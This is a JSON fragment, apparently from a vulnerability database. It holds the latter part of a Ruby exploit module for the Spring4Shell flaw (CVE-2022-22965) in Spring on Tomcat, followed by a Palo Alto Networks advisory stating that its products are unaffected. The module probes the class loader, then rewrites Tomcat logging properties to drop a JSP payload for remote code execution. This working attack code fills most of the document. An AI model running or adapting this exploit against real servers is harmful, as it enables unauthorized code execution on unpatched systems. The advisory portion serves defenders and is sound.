datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\n\n # Retry the block until it returns a truthy value. Each iteration attempt will\n # be performed with expoential backoff. If the timeout period surpasses, false is returned.\n def retry_until_true(timeout:)\n start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n ending_time = start_time + timeout\n retry_count = 0\n while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time\n result = yield\n return result if result\n\n retry_count += 1\n remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n break if remaining_time_budget <= 0\n\n delay = 2**retry_count\n if delay >= remaining_time_budget\n delay = remaining_time_budget\n vprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\")\n else\n vprint_status(\"Sleeping for #{delay} seconds before attempting again\")\n end\n\n sleep delay\n end\n\n false\n end\nend\n", "sourceHref": "https://0day.today/exploit/37692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2023-07-21T18:40:25", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}